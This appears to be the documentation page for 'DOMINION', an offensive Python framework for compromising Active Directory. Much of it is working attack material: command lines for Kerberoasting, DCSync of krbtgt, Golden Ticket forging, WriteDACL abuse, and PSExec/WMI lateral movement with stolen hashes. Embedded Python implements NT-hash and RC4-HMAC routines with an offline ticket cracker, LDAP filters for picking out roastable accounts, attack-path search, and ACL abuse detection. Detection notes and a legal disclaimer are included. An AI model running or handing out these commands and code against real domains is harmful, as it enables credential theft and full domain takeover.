Red Specter DOMINION

Pure Python Active Directory Attack Framework — 9 modules. 1,866 tests. 4 protocols. Zero .NET dependencies.

v1.0.0
Contents
Overview
Installation
Quick Start
ENUMERATE — AD Enumeration
PATHFIND — Attack Path Mapping
KERBEROS — Kerberos Attacks
NTLM — NTLM Attacks
SECRETS — Credential Extraction
GPO — Group Policy Abuse
ACL — ACL Abuse
LATERAL — Lateral Movement
PERSIST — Domain Persistence
UNLEASHED Mode
CLI Reference
Kill Chain Integration
API Reference
Disclaimer

Overview

DOMINION is a pure Python Active Directory attack framework. Every protocol — LDAP, Kerberos, SMB, DRSUAPI — implemented from scratch using Python's socket, struct, and ssl modules. No Impacket. No .NET. No PowerShell. No Rubeus. No Mimikatz. Pure engineering.

Nine modules. 1,866 tests. DOMINION enumerates Active Directory, maps attack paths to Domain Admin, exploits Kerberos and NTLM weaknesses, extracts secrets via DCSync, moves laterally across the domain, and establishes persistence — all from a single pure Python tool.

Pure Python Zero compiled dependencies. No Impacket. No .NET. No PowerShell.
9 Modules Enumerate, Pathfind, Kerberos, NTLM, Secrets, GPO, ACL, Lateral, Persist.
1,866 Tests Full test coverage across every module and protocol.
4 Protocols LDAP, Kerberos, SMB, DRSUAPI — all pure Python.

Installation

$ pip install red-specter-dominion

Also available as .deb and PKGBUILD (BlackArch).

Or from source:

$ git clone <repo>
$ cd red-specter-dominion
$ pip install -e ".[dev]"

Quick Start

# Enumerate domain
$ dominion enumerate --dc dc01.corp.local --domain corp.local --user jsmith --password P@ssw0rd

# Find path to Domain Admin
$ dominion pathfind --dc dc01.corp.local --target "Domain Admins"

# Kerberoast
$ dominion kerberoast --dc dc01.corp.local

# DCSync (UNLEASHED)
$ dominion dcsync --dc dc01.corp.local --user krbtgt --override --confirm-destroy

# BloodHound export
$ dominion bloodhound --dc dc01.corp.local --output bloodhound_data/

ENUMERATE — AD Enumeration

Full Active Directory enumeration via native LDAP implementation. 50+ built-in queries for users, groups, computers, trusts, GPOs, SPNs, OUs, and ACLs.

Capabilities dominion enumerate
# Full enumeration
$ dominion enumerate --dc dc01.corp.local --domain corp.local

# Users only
$ dominion users --dc dc01.corp.local

# Groups with membership
$ dominion groups --dc dc01.corp.local --recursive

# Computer objects
$ dominion computers --dc dc01.corp.local

# Domain trusts
$ dominion trusts --dc dc01.corp.local
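The queries above are LDAP searches, and a "native LDAP implementation" means producing their BER encoding by hand. The block below is an added example written for this page, not DOMINION's own code: it builds a simple BindRequest and a SearchRequest from the stdlib alone, with the two filters an enumeration pass cares about most (accounts with an SPN, and accounts with pre-authentication disabled). The helper names (tlv, f_eq, search_request and so on) and the corp.local names are this example's, not the project's.

```python
# Added example (not DOMINION's code): the LDAP wire encoding behind
# `dominion enumerate`-style queries, built with nothing but the stdlib.
# Helper names (tlv, f_eq, search_request, ...) are this example's own.


def ber_len(n: int) -> bytes:
    """X.690 definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(v: int, tag: int = 0x02) -> bytes:
    """INTEGER (or ENUMERATED with tag 0x0A): minimal two's-complement, big-endian."""
    return tlv(tag, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def octets(s: str) -> bytes:
    return tlv(0x04, s.encode())


# RFC 4511 Filter CHOICE: context-specific tags, constructed unless noted.
def f_and(*parts): return tlv(0xA0, b"".join(parts))                   # and [0]
def f_not(part): return tlv(0xA2, part)                                # not [2]
def f_eq(attr, value): return tlv(0xA3, octets(attr) + octets(value))  # equalityMatch [3]
def f_present(attr): return tlv(0x87, attr.encode())                   # present [7], primitive


LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def f_bit_and(attr: str, mask: int) -> bytes:
    """extensibleMatch [9] with the AD bitwise-AND rule: matchingRule [1], type [2], matchValue [3]."""
    return tlv(0xA9, tlv(0x81, LDAP_MATCHING_RULE_BIT_AND.encode())
               + tlv(0x82, attr.encode())
               + tlv(0x83, str(mask).encode()))


UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304


def kerberoastable_filter() -> bytes:
    """Enabled accounts carrying an SPN; krbtgt is excluded because its 'service' is the TGT itself."""
    return f_and(f_eq("objectCategory", "person"),
                 f_present("servicePrincipalName"),
                 f_not(f_eq("sAMAccountName", "krbtgt")),
                 f_not(f_bit_and("userAccountControl", UF_ACCOUNTDISABLE)))


def asreproastable_filter() -> bytes:
    """Enabled accounts with 'Do not require Kerberos preauthentication' set."""
    return f_and(f_eq("objectCategory", "person"),
                 f_bit_and("userAccountControl", UF_DONT_REQUIRE_PREAUTH),
                 f_not(f_bit_and("userAccountControl", UF_ACCOUNTDISABLE)))


def bind_request(msg_id: int, name: str, password: str) -> bytes:
    """LDAPMessage { messageID, BindRequest [APPLICATION 0] } with simple [0] auth.
    The password is sent in the clear, so a simple bind belongs on LDAPS only."""
    op = tlv(0x60, ber_int(3) + octets(name) + tlv(0x80, password.encode()))
    return tlv(0x30, ber_int(msg_id) + op)


def search_request(msg_id: int, base_dn: str, filt: bytes, attrs) -> bytes:
    """LDAPMessage { messageID, SearchRequest [APPLICATION 3] }: wholeSubtree, no limits."""
    op = tlv(0x63, octets(base_dn)
             + ber_int(2, 0x0A)            # scope: wholeSubtree
             + ber_int(0, 0x0A)            # derefAliases: neverDerefAliases
             + ber_int(0) + ber_int(0)     # sizeLimit, timeLimit: server default
             + tlv(0x01, b"\x00")          # typesOnly: FALSE
             + filt
             + tlv(0x30, b"".join(octets(a) for a in attrs)))
    return tlv(0x30, ber_int(msg_id) + op)


if __name__ == "__main__":
    # What goes on the wire after a bind, for a Kerberoast candidate sweep.
    print(search_request(2, "DC=corp,DC=local", kerberoastable_filter(),
                         ["sAMAccountName", "servicePrincipalName", "pwdLastSet"]).hex())
```

The bitwise-AND rule is how "enabled" and "pre-auth not required" are expressed: userAccountControl is a flag word, and a plain equality match on it would miss every account with any other bit set. Send the bind only over LDAPS (the --ldaps flag): the simple-bind password travels as plain octets.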

PATHFIND — Attack Path Mapping

BloodHound-style attack path discovery. Shortest path to Domain Admin through ACL chains, delegation abuse, trust relationships, and group nesting.

Capabilities dominion pathfind
# Find path to Domain Admins
$ dominion pathfind --dc dc01.corp.local --target "Domain Admins"

# All paths (not just shortest)
$ dominion pathfind --dc dc01.corp.local --target "Domain Admins" --all-paths
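Shortest-path and all-paths over a privilege graph are the two searches behind the commands above. The block below is an added example, not DOMINION's code: the edge list is constructed (the corp.local principals and the edge kinds are this example's own, borrowing BloodHound's vocabulary), group nesting and ACL primitives share one directed graph, and the two functions show why the default answer and the --all-paths answer differ.

```python
# Added example, not DOMINION's code: the graph search behind a pathfind step,
# on a constructed edge list. Node names, edge kinds and helper names are this
# example's own (edge kinds follow BloodHound's naming).
from collections import deque

# (source, edge kind, target): every edge means "source can act as / become target".
EDGES = [
    ("JSMITH@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("JSMITH@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "GenericAll", "SVC_SQL@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AddMember", "IT ADMINS@CORP.LOCAL"),
    ("IT ADMINS@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("IT ADMINS@CORP.LOCAL", "GenericAll", "SVC_SQL@CORP.LOCAL"),
    ("SVC_SQL@CORP.LOCAL", "MemberOf", "SQL ADMINS@CORP.LOCAL"),
    ("SQL ADMINS@CORP.LOCAL", "WriteDacl", "DOMAIN ADMINS@CORP.LOCAL"),
]


def adjacency(edges):
    adj = {}
    for src, kind, dst in edges:
        adj.setdefault(src, []).append((kind, dst))
    return adj


def shortest_path(edges, start, target):
    """BFS: fewest hops from start to target as [(src, kind, dst), ...], or None."""
    adj, parent, queue = adjacency(edges), {start: None}, deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while parent[node] is not None:
                src, kind = parent[node]
                path.append((src, kind, node))
                node = src
            return path[::-1]
        for kind, nxt in adj.get(node, []):
            if nxt not in parent:          # first visit is the shortest in hop count
                parent[nxt] = (node, kind)
                queue.append(nxt)
    return None


def all_paths(edges, start, target):
    """DFS over simple paths (no node revisited), the --all-paths view, shortest first."""
    adj, found = adjacency(edges), []

    def walk(node, path, seen):
        if node == target:
            found.append(list(path))
            return
        for kind, nxt in adj.get(node, []):
            if nxt not in seen:            # cycles (IT ADMINS -> SVC_SQL -> ...) stop here
                path.append((node, kind, nxt))
                walk(nxt, path, seen | {nxt})
                path.pop()

    walk(start, [], {start})
    return sorted(found, key=len)


def render(path):
    return path[0][0] + "".join(f" -[{kind}]-> {dst}" for _, kind, dst in path)


if __name__ == "__main__":
    target = "DOMAIN ADMINS@CORP.LOCAL"
    print(render(shortest_path(EDGES, "JSMITH@CORP.LOCAL", target)))
    for p in all_paths(EDGES, "JSMITH@CORP.LOCAL", target):
        print(len(p), "hops:", render(p))
```

Hop count is the only cost here; a real pathfinder weights edges (a MemberOf hop is free, a ForceChangePassword hop locks the victim out and is noisy), which can make a longer path the one an operator actually wants.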

KERBEROS — Kerberos Attacks

Pure Python Kerberos implementation. ASN.1 message construction, RC4-HMAC encryption, and full attack coverage — Kerberoast, AS-REP Roast, Golden/Silver Tickets, S4U delegation abuse.

01 Kerberoast

Request TGS tickets for accounts with SPNs set. Extract RC4-HMAC encrypted tickets for offline cracking with GHOUL. Pure Python TGS-REQ construction. Any authenticated domain account can make these requests; the usual detection is a 4769 event on the DC showing ticket encryption type 0x17 (RC4) for an account that supports AES, so expect the request to be logged.

02 AS-REP Roast

Target accounts with Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH in userAccountControl). Request an AS-REP for them without credentials: its enc-part is encrypted under the account's own key, so only a list of usernames is needed and the result is cracked offline.

03 Golden / Silver Tickets (UNLEASHED)

Forge Kerberos tickets using extracted krbtgt or service account hashes. A Golden Ticket is a forged TGT and provides unrestricted domain access until the krbtgt password is reset twice (the KDC honours the previous key as well). A Silver Ticket is a forged service ticket for a single service; it is encrypted under that service's key and never touches the KDC, so it leaves no 4768/4769 event on the DC.

# Kerberoast — extract TGS hashes
$ dominion kerberoast --dc dc01.corp.local

# AS-REP Roast
$ dominion asreproast --dc dc01.corp.local

# Golden Ticket (UNLEASHED)
$ dominion persist --golden --krbtgt-hash HASH --override --confirm-destroy

NTLM — NTLM Attacks

Pure Python NTLM implementation. Pass-the-Hash, NTLM relay, NTLMv2 capture. Challenge-response authentication built from the MS-NLMP specification. Relay only works against services that do not enforce signing (SMB) or channel binding (LDAPS, HTTPS with Extended Protection); a captured NTLMv2 response is bound to the server challenge and cannot be replayed, only cracked offline.

Capabilities
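The credential maths underneath both the Kerberoast passage above and this NTLM section is the same small set of primitives: MD4 for the NT hash, HMAC-MD5 for NTLMv2, and RC4 with HMAC-MD5 for Kerberos etype 23. The block below is an added example for this page, not DOMINION's code. The NTLMv2 values it checks are the worked example in MS-NLMP section 4.2.4 (user "User", domain "Domain", password "Password"); the ticket it "cracks" is constructed in the block under a made-up service password, and all function names are this example's own. MD4 is written out because OpenSSL 3 builds of hashlib often refuse hashlib.new("md4").

```python
# Added example, not DOMINION's code: the credential maths behind the Kerberoast
# and NTLM sections, in stdlib Python. MD4 is written out because OpenSSL 3
# builds of hashlib often reject hashlib.new("md4"). Names are this example's own.
import hashlib, hmac, struct

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: three 16-step rounds per 512-bit block, little-endian words."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                t = (a + fn(b, c, d) + X[j] + k) & 0xFFFFFFFF
                s = shifts[i % 4]
                a, b, c, d = d, ((t << s) | (t >> (32 - s))) & 0xFFFFFFFF, b, c
        a, b, c, d = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF, (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password, the value Pass-the-Hash replays."""
    return md4(password.encode("utf-16-le"))

def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NTOWFv1, UPPER(user) || domain) in UTF-16LE; the domain keeps its case."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()

def ntlmv2_proof(password, user, domain, server_challenge: bytes, temp: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp). The wire response is proof || temp,
    and user::domain:challenge:proof:temp is the line an offline cracker consumes."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + temp, hashlib.md5).digest()

# MS-NLMP 4.2.4 example blob: v1.1, time 0, client nonce aa*8, target info
# {NbDomainName "Domain", NbComputerName "Server"}, EOL pair, 4 trailing zero bytes.
MSNLMP_SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
MSNLMP_TEMP = bytes.fromhex(
    "0101000000000000" "0000000000000000" "aaaaaaaaaaaaaaaa" "00000000"
    "02000c00" "44006f006d00610069006e00" "01000c00" "530065007200760065007200"
    "00000000" "00000000")

def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for ch in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(ch ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

KU_TICKET = 2  # RFC 4120 key usage for a ticket's enc-part, the part Kerberoast cracks

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 etype 23: K1 = HMAC(K, usage), checksum = HMAC(K1, data), K3 = HMAC(K1, checksum)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, confounder + plaintext)

def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Plaintext minus the 8-byte confounder, or None when the checksum fails;
    that check is what an offline cracker runs once per candidate password."""
    checksum, cipher = edata[:16], edata[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plain = rc4(k3, cipher)
    if not hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
        return None
    return plain[8:]

def crack_krb5tgs23(edata: bytes, wordlist):
    """Offline Kerberoast: the service account's NT hash is the RC4-HMAC key."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), KU_TICKET, edata) is not None:
            return candidate
    return None

if __name__ == "__main__":
    proof = ntlmv2_proof("Password", "User", "Domain", MSNLMP_SERVER_CHALLENGE, MSNLMP_TEMP)
    print(f"User::Domain:{MSNLMP_SERVER_CHALLENGE.hex()}:{proof.hex()}:{MSNLMP_TEMP.hex()}")
    # Constructed ticket enc-part under a made-up service password, recovered from a tiny wordlist.
    edata = rc4_hmac_encrypt(nt_hash("Summer2024!"), KU_TICKET, b"EncTicketPart", b"\x00" * 8)
    print(crack_krb5tgs23(edata, ["Winter2023!", "Summer2024!"]))
```

Two things worth noticing: the RC4-HMAC key for a service ticket is literally the account's NT hash, which is why an etype 23 Kerberoast costs one MD4 plus three HMAC-MD5 per guess and AES etypes (PBKDF2 with 4096 iterations) cost orders of magnitude more; and the NTLMv2 proof covers the server challenge, so a capture is only useful for cracking unless it is relayed live.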

SECRETS — Credential Extraction

Domain secret extraction via DCSync and direct database parsing. Pure Python DRSUAPI implementation for domain replication. DCSync is a replication request (IDL_DRSGetNCChanges over MSRPC): it needs the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain naming context, which Domain Admins and domain controllers hold by default. It reads rather than writes directory data, but the request is recorded on the DC as a 4662 event when directory-service access auditing is on.

Capabilities dominion secrets / dominion dcsync
# DCSync krbtgt (UNLEASHED)
$ dominion dcsync --dc dc01.corp.local --user krbtgt --override --confirm-destroy

# DCSync all users (UNLEASHED)
$ dominion dcsync --dc dc01.corp.local --all --override --confirm-destroy

# LAPS password retrieval
$ dominion secrets --laps --dc dc01.corp.local

GPO — Group Policy Abuse

Group Policy exploitation. GPP password extraction, GPO modification for code execution, and scheduled task creation via policy. GPP passwords (the cpassword attribute in Groups.xml, ScheduledTasks.xml and similar preference files under SYSVOL) are AES-256 encrypted with a key Microsoft published, so any domain user who can read SYSVOL can recover them; MS14-025 stopped Windows writing new ones but left existing files in place. GPO modification needs write access to both the GPO's AD object and its SYSVOL folder, and the payload runs only when clients next refresh policy.

Capabilities dominion gpo

ACL — ACL Abuse

ACL analysis and exploitation. 17+ dangerous ACE types identified. Shadow Credentials (write access to the target's msDS-KeyCredentialLink attribute) and AD CS certificate template abuse (ESC1-ESC8). ACE analysis has to account for deny ACEs and inheritance flags: an inherit-only ACE grants nothing on the object it sits on, and an object-scoped ACE is only as dangerous as the attribute or right its GUID names.

17+ Dangerous ACEs dominion acl
# Scan for abusable ACLs
$ dominion acl --dc dc01.corp.local --scan

# Exploit WriteDACL (UNLEASHED)
$ dominion acl --exploit WriteDACL --target "Domain Admins" --override --confirm-destroy
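A scan like the one above starts from the raw nTSecurityDescriptor bytes LDAP returns. The block below is an added example, not DOMINION's code: it parses a self-relative security descriptor (MS-DTYP 2.4.6), walks the DACL, and maps each allow ACE to the abuse primitive it grants, skipping deny ACEs, inherit-only ACEs and the principals expected to hold the right. The rights and GUIDs it knows are a common subset of the "17+" the page counts, and the sample descriptor is constructed in the block with made-up SIDs.

```python
# Added example, not DOMINION's code: parse a self-relative security descriptor
# (MS-DTYP 2.4.6), the form nTSecurityDescriptor comes back in, and flag the ACEs
# that hand a principal control of the object. The rights and GUIDs below are a
# common subset of the "17+" the page counts; the sample SIDs are made up.
import struct, uuid

GENERIC_ALL, GENERIC_WRITE, WRITE_DACL, WRITE_OWNER = 0x10000000, 0x40000000, 0x40000, 0x80000
DS_WRITE_PROPERTY, DS_CONTROL_ACCESS = 0x20, 0x100        # object-scoped write / extended right
ACCESS_ALLOWED, ACCESS_ALLOWED_OBJECT, INHERIT_ONLY_ACE = 0x00, 0x05, 0x08

# schemaIDGUID / rightsGuid values that make an object-scoped ACE dangerous
MEMBER_ATTR = uuid.UUID("bf9679c0-0de6-11d0-a285-00aa003049e2")
KEY_CREDENTIAL_LINK = uuid.UUID("5b47d60f-6090-40b2-9f37-2a4de88f3063")
FORCE_CHANGE_PASSWORD = uuid.UUID("00299570-246d-11d0-a768-00aa006e0529")
DS_REPL_GET_CHANGES = uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2")
DS_REPL_GET_CHANGES_ALL = uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
WRITE_PROPERTY_LABELS = {None: "WriteAllProperties", MEMBER_ATTR: "AddMember",
                         KEY_CREDENTIAL_LINK: "AddKeyCredentialLink"}
CONTROL_ACCESS_LABELS = {None: "AllExtendedRights", FORCE_CHANGE_PASSWORD: "ForceChangePassword",
                         DS_REPL_GET_CHANGES: "GetChanges", DS_REPL_GET_CHANGES_ALL: "GetChangesAll"}

def parse_sid(buf, off):
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")          # 48-bit big-endian
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)           # sub-authorities little-endian
    return "-".join(["S", str(rev), str(authority), *map(str, subs)]), off + 8 + 4 * count

def parse_dacl(sd):
    """Yield one dict per ACE in the DACL; OffsetDacl == 0 means there is no DACL at all."""
    dacl_off = struct.unpack_from("<I", sd, 16)[0]                    # SECURITY_DESCRIPTOR.OffsetDacl
    if dacl_off == 0:
        return
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]         # ACL.AceCount
    off = dacl_off + 8
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        p, object_type = off + 8, None
        if ace_type in (0x05, 0x06, 0x07, 0x08):                      # *_OBJECT_ACE layouts
            obj_flags = struct.unpack_from("<I", sd, p)[0]
            p += 4
            if obj_flags & 1:                                         # ACE_OBJECT_TYPE_PRESENT
                object_type, p = uuid.UUID(bytes_le=sd[p:p + 16]), p + 16
            if obj_flags & 2:                                         # ACE_INHERITED_OBJECT_TYPE_PRESENT
                p += 16
        yield {"type": ace_type, "flags": ace_flags, "mask": mask,
               "object_type": object_type, "sid": parse_sid(sd, p)[0]}
        off += ace_size

def labels_for(ace):
    """Abuse primitives one ACE grants on this object (deny and inherit-only ACEs grant none)."""
    if ace["type"] not in (ACCESS_ALLOWED, ACCESS_ALLOWED_OBJECT) or ace["flags"] & INHERIT_ONLY_ACE:
        return []
    mask, guid = ace["mask"], ace["object_type"]
    if guid is None and mask & GENERIC_ALL:
        return ["GenericAll"]
    out = [name for bit, name in ((GENERIC_WRITE, "GenericWrite"), (WRITE_DACL, "WriteDacl"),
                                  (WRITE_OWNER, "WriteOwner")) if guid is None and mask & bit]
    if mask & DS_WRITE_PROPERTY and guid in WRITE_PROPERTY_LABELS:
        out.append(WRITE_PROPERTY_LABELS[guid])
    if mask & DS_CONTROL_ACCESS and guid in CONTROL_ACCESS_LABELS:
        out.append(CONTROL_ACCESS_LABELS[guid])
    return out

def find_abusable(sd, ignore_rids=(512, 519, 544)):
    """(sid, primitive) pairs, skipping principals expected to hold them: DA, EA, Administrators."""
    return [(ace["sid"], label) for ace in parse_dacl(sd)
            if int(ace["sid"].rsplit("-", 1)[1]) not in ignore_rids
            for label in labels_for(ace)]

# Constructed sample descriptor, not from a real domain.
def make_sid(*subs, authority=5):
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def make_ace(ace_type, mask, sid, object_type=None, flags=0):
    body = struct.pack("<I", mask)
    if ace_type == ACCESS_ALLOWED_OBJECT:
        body += struct.pack("<I", 0 if object_type is None else 1)
        body += b"" if object_type is None else object_type.bytes_le
    return struct.pack("<BBH", ace_type, flags, 4 + len(body) + len(sid)) + body + sid

def make_sd(aces):
    dacl = struct.pack("<BBHHH", 4, 0, 8 + sum(map(len, aces)), len(aces), 0) + b"".join(aces)
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + dacl  # SE_SELF_RELATIVE|SE_DACL_PRESENT

DOM = (21, 1111, 2222, 3333)
SAMPLE_SD = make_sd([
    make_ace(ACCESS_ALLOWED, GENERIC_ALL, make_sid(*DOM, 512)),                   # Domain Admins: expected
    make_ace(ACCESS_ALLOWED_OBJECT, DS_WRITE_PROPERTY, make_sid(*DOM, 1105), MEMBER_ATTR),
    make_ace(ACCESS_ALLOWED_OBJECT, DS_CONTROL_ACCESS, make_sid(*DOM, 1106), DS_REPL_GET_CHANGES_ALL),
    make_ace(ACCESS_ALLOWED, WRITE_DACL, make_sid(*DOM, 1107)),
    make_ace(ACCESS_ALLOWED, GENERIC_ALL, make_sid(*DOM, 1108), flags=INHERIT_ONLY_ACE),  # children only
    make_ace(0x01, GENERIC_ALL, make_sid(*DOM, 1109)),                             # ACCESS_DENIED_ACE
    make_ace(ACCESS_ALLOWED_OBJECT, DS_CONTROL_ACCESS, make_sid(*DOM, 1110)),     # untyped: every right
])

if __name__ == "__main__":
    for sid, label in find_abusable(SAMPLE_SD):
        print(sid, label)
```

The untyped DS_CONTROL_ACCESS ACE at the end is the one people miss: with no ObjectType GUID it grants every extended right on the object, including both replication rights on a domain head, which is a DCSync path even though neither replication GUID appears in the ACE.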

LATERAL — Lateral Movement

Pure Python lateral movement across Active Directory. Six execution methods implemented from protocol specifications.

Execution Methods dominion lateral
# WMI execution (UNLEASHED)
$ dominion lateral --method wmi --target server01.corp.local --command "whoami" --override --confirm-destroy

# PSExec with hash (UNLEASHED)
$ dominion lateral --method psexec --target server01.corp.local --hash NTLM_HASH --override --confirm-destroy

PERSIST — Domain Persistence

Domain persistence mechanisms. All UNLEASHED only — these operations modify Active Directory.

Persistence Methods dominion persist

DOMINION UNLEASHED

Cryptographic override. Private key controlled. One operator. Founder's machine only.

Standard mode enumerates and assesses. UNLEASHED mode executes attacks. DCSync, Golden Tickets, ACL exploitation, lateral movement, persistence — all require UNLEASHED.

Capability          Standard              UNLEASHED
Enumeration         Full LDAP             Full + recursive + BloodHound
Kerberoast          Identify SPNs         Request tickets, extract hashes
DCSync              Check privileges      Full domain replication
Golden Ticket       Check requirements    Forge and inject
ACL abuse           Identify ACEs         Execute exploitation
Lateral movement    Identify targets      Execute WMI/PSExec/WinRM
Persistence         Document methods      Deploy mechanisms
Key required        No                    Ed25519
# UNLEASHED — full domain compromise
$ dominion dcsync --dc dc01.corp.local --all --override --confirm-destroy

UNLEASHED mode is restricted to authorised operators with Ed25519 private key access. The key must be present at ~/.redspecter/override_private.pem. Both --override and --confirm-destroy are required for live execution; --override on its own is a dry run. The gate is cryptographic. There is no bypass. ACL exploitation, GPO changes and persistence write to Active Directory; PSExec-style lateral movement changes the target host (the technique installs a service there); DCSync does not write to the directory, but it is a privileged replication request that the DC audits. Any of them may disrupt production services.

CLI Reference

Commands

Command               Description
dominion enumerate    Full domain enumeration
dominion users        Enumerate domain users
dominion groups       Enumerate groups and memberships
dominion computers    Enumerate computer objects
dominion trusts       Enumerate domain trusts
dominion pathfind     Map attack paths to target
dominion kerberoast   Kerberoast — extract TGS hashes
dominion asreproast   AS-REP Roast — extract AS-REP hashes
dominion dcsync       DCSync — domain replication (UNLEASHED)
dominion secrets      Extract LAPS, gMSA, LSA, DPAPI
dominion gpo          GPO enumeration and exploitation
dominion acl          ACL analysis and exploitation
dominion lateral      Lateral movement execution (UNLEASHED)
dominion persist      Persistence deployment (UNLEASHED)
dominion bloodhound   BloodHound-compatible JSON export

Connection Options

Flag                Description
--dc                Domain controller hostname or IP
--domain            Domain FQDN
--user              Username for authentication
--password          Password for authentication
--hash              NTLM hash for Pass-the-Hash
--ticket            Kerberos ticket (.ccache) for auth
--ldaps             Use LDAPS (port 636)
--override          Enter UNLEASHED mode; without --confirm-destroy the operation is a dry run
--confirm-destroy   Execute the UNLEASHED operation for real (used together with --override)
--output            Output directory for results

Kill Chain Integration

DOMINION operates as the final stage in the Red Specter traditional infrastructure attack chain. WRAITH finds. REAPER exploits. GHOUL cracks. DOMINION conquers the domain.

01 WRAITH Scans
02 REAPER Exploits
03 GHOUL Cracks
04 DOMINION Conquers
GHOUL → DOMINION Cracked Kerberos hashes enable DCSync and domain persistence.
DOMINION → GHOUL Kerberoast and AS-REP hashes feed into GHOUL for cracking.
WRAITH → DOMINION Network discovery identifies DCs, LDAP ports, and Kerberos services.
NEMESIS Orchestration Domain compromise feeds into AI infrastructure exploitation chains.

API Reference

DOMINION exposes a Python API for programmatic integration.

# Enumerate domain
from dominion import enumerate_domain

results = enumerate_domain(
    dc="dc01.corp.local",
    domain="corp.local",
    username="jsmith",
    password="P@ssw0rd",
)

# Find attack paths
from dominion import pathfind

paths = pathfind(dc="dc01.corp.local", target="Domain Admins")

# Kerberoast
from dominion import kerberoast

hashes = kerberoast(dc="dc01.corp.local")

# BloodHound export
from dominion import bloodhound_export

bloodhound_export(dc="dc01.corp.local", output_dir="bloodhound_data/")

Disclaimer

Red Specter DOMINION is designed for authorised security testing, research, and educational purposes only. You must have explicit written permission from the domain owner before running any DOMINION tool against Active Directory. DOMINION operations, especially ACL exploitation, lateral movement, and persistence, modify domain objects or target hosts and may disrupt production services; DCSync does not write to the directory, but it is a privileged replication request that is audited on the domain controller. Testing must only be performed against systems you are authorised to test. Unauthorised use may violate the Computer Misuse Act 1990 (UK), the Computer Fraud and Abuse Act (US), or equivalent legislation in your jurisdiction. The authors accept no liability for misuse or damage resulting from improper use.